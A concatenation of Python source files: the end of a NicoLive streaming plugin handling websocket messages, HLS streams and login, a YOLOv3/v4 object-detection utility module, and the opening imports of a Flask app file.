_log.error(
"Failed to get wss_api_url. "
"Please check if the URL is correct, "
"and make sure your account has access to the video.")
return None
self.api_connect(self.wss_api_url)
i = 0
while not self.is_stream_ready:
if i % 10 == 0:
_log.debug("Waiting for permit...")
if i == 600:
_log.error("Waiting for permit timed out.")
return None
if self.is_stream_ended:
return None
time.sleep(0.1)
i += 1
streams = HLSStream.parse_variant_playlist(
self.session, self.hls_stream_url)
nico_streams = {}
for s in streams:
nico_stream = NicoHLSStream(streams[s], self)
nico_streams[s] = nico_stream
return nico_streams
def get_wss_api_url(self):
_log.debug("Getting video page: {0}".format(self.url))
resp = self.session.http.get(self.url)
try:
self.wss_api_url = extract_text(
resp.text, ""webSocketUrl":"", """)
if not self.wss_api_url:
return False
except Exception as e:
_log.debug(e)
_log.debug("Failed to extract wss api url")
return False
try:
self.frontend_id = extract_text(
resp.text, ""frontendId":", ","")
except Exception as e:
_log.debug(e)
_log.warning("Failed to extract frontend id")
self.wss_api_url = "{0}&frontend_id={1}".format(self.wss_api_url, self.frontend_id)
_log.debug("Video page response code: {0}".format(resp.status_code))
_log.trace("Video page response body: {0}".format(resp.text))
_log.debug("Got wss_api_url: {0}".format(self.wss_api_url))
_log.debug("Got frontend_id: {0}".format(self.frontend_id))
return self.wss_api_url.startswith("wss://")
def api_on_open(self):
self.send_playerversion()
require_new_stream = not self.is_stream_ready
self.send_getpermit(require_new_stream=require_new_stream)
def api_on_error(self, ws, error=None):
if error:
_log.warning(error)
_log.warning("wss api disconnected.")
_log.warning("Attempting to reconnect in 5 secs...")
time.sleep(5)
self.api_connect(self.wss_api_url)
def api_connect(self, url):
# Proxy support adapted from the UStreamTV plugin (ustreamtv.py)
proxy_url = self.session.get_option("https-proxy")
if proxy_url is None:
proxy_url = self.session.get_option("http-proxy")
proxy_options = parse_proxy_url(proxy_url)
if proxy_options.get('http_proxy_host'):
_log.debug("Using proxy ({0}://{1}:{2})".format(
proxy_options.get('proxy_type') or "http",
proxy_options.get('http_proxy_host'),
proxy_options.get('http_proxy_port') or 80))
_log.debug("Connecting: {0}".format(url))
if logger.root.level <= logger.TRACE:
websocket.enableTrace(True, _log)
def on_error(wssapp, error):
return self.api_on_error(wssapp, error)
def on_message(wssapp, message):
return self.handle_api_message(message)
def on_open(wssapp):
return self.api_on_open()
self._ws = websocket.WebSocketApp(
url,
header=["User-Agent: {0}".format(useragents.CHROME)],
on_open=on_open,
on_message=on_message,
on_error=on_error)
self.ws_worker_thread = threading.Thread(
target=self._ws.run_forever,
kwargs=proxy_options)
self.ws_worker_thread.daemon = True
self.ws_worker_thread.start()
def send_message(self, type_, body):
msg = {"type": type_, "body": body}
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_no_body_message(self, type_):
msg = {"type": type_}
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_custom_message(self, msg):
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_playerversion(self):
body = {
"type": "startWatching",
"data": {
"stream": {
"quality": "abr",
"protocol": "hls",
"latency": "high",
"chasePlay": False
},
"room": {
"protocol": "webSocket",
"commentable": True
},
"reconnect": False
}
}
self.send_custom_message(body)
def send_getpermit(self, require_new_stream=True):
body = {
"type": "getAkashic",
"data": {
"chasePlay": False
}
}
self.send_custom_message(body)
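    # Note: the two senders above keep their legacy names (playerversion/getpermit)
    # but actually emit the newer "startWatching" and "getAkashic" messages.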
def send_watching(self):
body = {
"command": "watching",
"params": [self.broadcast_id, "-1", "0"]
}
self.send_message("watch", body)
def send_pong(self):
self.send_no_body_message("pong")
self.send_no_body_message("keepSeat")
def handle_api_message(self, message):
_log.debug(f"Received: {message}")
message_parsed = json.loads(message)
if message_parsed["type"] == "stream":
data = message_parsed["data"]
self.hls_stream_url = data["uri"]
# load in the offset for timeshift live videos
offset = self.get_option("timeshift-offset")
if offset and 'timeshift' in self.wss_api_url:
self.hls_stream_url = update_qsd(self.hls_stream_url, {"start": offset})
self.is_stream_ready = True
if message_parsed["type"] == "watch":
body = message_parsed["body"]
command = body["command"]
if command == "currentstream":
current_stream = body["currentStream"]
self.hls_stream_url = current_stream["uri"]
self.is_stream_ready = True
elif command == "watchinginterval":
self.watching_interval = int(body["params"][0])
_log.debug("Got watching_interval: {0}".format(
self.watching_interval))
if self.watching_interval_worker_thread is None:
_log.debug("send_watching_scheduler starting.")
self.watching_interval_worker_thread = threading.Thread(
target=self.send_watching_scheduler)
self.watching_interval_worker_thread.daemon = True
self.watching_interval_worker_thread.start()
else:
_log.debug("send_watching_scheduler already running.")
elif command == "disconnect":
_log.info("Websocket API closed.")
_log.info("Stream ended.")
self.is_stream_ended = True
if self.stream_reader is not None:
self.stream_reader.close()
_log.info("Stream reader closed.")
elif message_parsed["type"] == "ping":
self.send_pong()
def send_watching_scheduler(self):
"""
Periodically send "watching" command to the API.
This is necessary to keep the session alive.
"""
while not self.is_stream_ended:
self.send_watching()
time.sleep(self.watching_interval)
def niconico_web_login(self):
user_session = self.get_option("user-session")
email = self.get_option("email")
password = self.get_option("password")
if user_session is not None:
_log.info("User session cookie is provided. Using it.")
self.session.http.cookies.set(
"user_session",
user_session,
path="/",
domain="nicovideo.jp")
self.save_cookies()
return True
elif self.session.http.cookies.get("user_session"):
_log.info("cached session cookie is provided. Using it.")
return True
elif email is not None and password is not None:
_log.info("Email and password are provided. Attemping login.")
payload = {"mail_tel": email, "password": password}
resp = self.session.http.post(_login_url, data=payload,
params=_login_url_params)
_log.debug("Login response code: {0}".format(resp.status_code))
_log.trace("Login response body: {0}".format(resp.text))
_log.debug("Cookies: {0}".format(
self.session.http.cookies.get_dict()))
if self.session.http.cookies.get("user_session") is None:
try:
msg = extract_text(
resp.text, '<p class="notice__text">', "</p>")
except Exception as e:
_log.debug(e)
msg = "unknown reason"
_log.warning("Login failed. {0}".format(msg))
return False
else:
_log.info("Logged in.")
self.save_cookies()
return True
else:
return False
class NicoHLSStream(HLSStream):
def __init__(self, hls_stream, nicolive_plugin):
super().__init__(
hls_stream.session,
force_restart=hls_stream.force_restart,
start_offset=hls_stream.start_offset,
duration=hls_stream.duration,
**hls_stream.args)
# url is already in hls_stream.args
self.nicolive_plugin = nicolive_plugin
def open(self):
reader = super().open()
self.nicolive_plugin.stream_reader = reader
return reader
def extract_text(text, left, right):
"""Extract text from HTML"""
result = re.findall("{0}(.*?){1}".format(left, right), text)
if len(result) != 1:
raise Exception("Failed to extract string. "
"Expected 1, found {0}".format(len(result)))
return result[0]
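# Illustrative usage: extract_text('<p class="x">hello</p>', '<p class="x">', '</p>')
# returns 'hello'; anything other than exactly one match raises.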
def parse_proxy_url(purl):
"""Adapted from UStreamTV plugin (ustreamtv.py)"""
proxy_options = {}
if purl:
p = urlparse(purl)
proxy_options['proxy_type'] = p.scheme
proxy_options['http_proxy_host'] = p.hostname
if p.port:
proxy_options['http_proxy_port'] = p.port
if p.username:
proxy_options['http_proxy_auth'] = \
(unquote_plus(p.username), unquote_plus(p.password or ""))
return proxy_options
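# Illustrative usage: parse_proxy_url("http://user:pw@127.0.0.1:8080") returns
# {'proxy_type': 'http', 'http_proxy_host': '127.0.0.1', 'http_proxy_port': 8080,
#  'http_proxy_auth': ('user', 'pw')}, which is passed straight to
# websocket.WebSocketApp.run_forever() above.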
__plugin__ = NicoLive
|
utils.py
|
#================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import json
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if YOLO_CUSTOM_WEIGHTS == False:
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights("checkpoints/yolov3_custom") # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
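# Worked example (illustrative): letterboxing a 640x480 frame to a 416x416 input
# gives scale = min(416/640, 416/480) = 0.65, a resized image of 416x312, and
# (416-312)//2 = 52 rows of gray (128) padding top and bottom before the
# division by 255 normalises the result to [0, 1].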
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
data = {}
data['components'] = []
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
coordinates = coor.tolist()
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
classResult = "{}".format(NUM_CLASS[class_ind])
label = "{}".format(NUM_CLASS[class_ind]) + score_str
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
data['components'].append({
'name': classResult,
'score': score_str,
'coordinates': coordinates
})
with open('/home/pi/PiServer/Julio/machine_learning/results.json', 'w') as outfile:
json.dump(data, outfile, indent=4, sort_keys=True)
print("results.json file saved")
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
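# --- Illustrative sketch (editor addition): a worked IoU computation ---
# bboxes_iou() broadcasts over numpy arrays. For the two boxes below the
# intersection is 50*50 = 2500 and the union is 10000 + 10000 - 2500 = 17500,
# so the IoU is 2500 / 17500 ≈ 0.143.
def _iou_example():
    box_a = np.array([0, 0, 100, 100])
    box_b = np.array([50, 50, 150, 150])
    return bboxes_iou(box_a, box_b)  # ≈ 0.143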
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Step 1: keep looping while any boxes of this class remain
while len(cls_bboxes) > 0:
# Step 2: select the box with the highest score as box A
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
# Step 3: compute the IoU between box A and the remaining boxes, then
# suppress (or, for soft-nms, down-weight) boxes whose IoU exceeds the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
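# --- Illustrative sketch (editor addition): class-wise NMS on two detections ---
# nms() expects an (N, 6) array of (xmin, ymin, xmax, ymax, score, class) rows.
# The boxes below overlap with IoU ≈ 0.68, so with the default 'nms' method and
# iou_threshold=0.45 only the higher-scoring box is kept.
def _nms_example():
    dets = np.array([[0, 0, 100, 100, 0.9, 0],
                     [10, 10, 110, 110, 0.8, 0]])
    return nms(dets, iou_threshold=0.45, method='nms')  # one box survives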
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
# 3. clip some boxes those are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
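# --- Illustrative sketch (editor addition): undoing the letterbox transform ---
# Step 2 of postprocess_boxes() inverts image_preprocess():
#   x_org = (x_net - dw) / resize_ratio
# For the hypothetical 640x480 frame above, resize_ratio = 0.65 and dw = 0,
# so a network-space x of 208 maps back to 208 / 0.65 = 320 in the original frame.
def _unletterbox_x(x_net, input_size=416, org_w=640, org_h=480):
    resize_ratio = min(input_size / org_w, input_size / org_h)
    dw = (input_size - resize_ratio * org_w) / 2
    return (x_net - dw) / resize_ratio  # e.g. _unletterbox_x(208) -> 320.0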
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB) # convert once; a second BGR2RGB would swap the channels back to BGR
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': cv2.imwrite(output_path, image)
if show:
# Show the image
cv2.imshow("predicted image", image)
# Load and hold the image
cv2.waitKey(0)
# To close the window after the required kill value was provided
cv2.destroyAllWindows()
return image
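# --- Illustrative sketch (editor addition): a typical single-image call ---
# detect_image() ties preprocessing, inference, postprocess_boxes() and nms()
# together. A hypothetical invocation (the paths are placeholders):
def _detect_image_example():
    yolo = Load_Yolo_model()
    return detect_image(yolo, "input.jpg", "output.jpg",
                        input_size=YOLO_INPUT_SIZE, show=False)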
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: print("RuntimeError in tf.config.experimental.set_memory_growth")
Yolo = Load_Yolo_model()
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
Processing_times.put(time.time())
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
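# --- Illustrative sketch (editor addition): the three-stage queue pipeline ---
# detect_video_realtime_mp() below wires the worker processes together as
#   frames -> Frames_data -> Predict_bbox_mp -> Predicted_data
#          -> postprocess_mp -> Processed_frames -> Show_Image_mp -> Final_frames
# Each stage busy-polls its input queue. The shared shape of every stage,
# reduced to a toy helper (inp/out are multiprocessing.Queue instances):
def _pipeline_stage(inp, out, fn):
    while True:
        if inp.qsize() > 0:
            out.put(fn(inp.get()))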
# detect from webcam
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # convert once; a second BGR2RGB would swap the channels back to BGR
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
cv2.destroyAllWindows()
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
t3 = time.time()
times.append(t2-t1)
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
ret, frame = vid.read()
if not ret:
break
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
rockwell.py
|
# from blueprints.influxdb import *
# from main import *
from flask import Flask, render_template, request, redirect, url_for, flash, session, send_from_directory, send_file,Blueprint,current_app
from flask_bootstrap import Bootstrap
import random, datetime
from functools import wraps
import time
import functools
import os
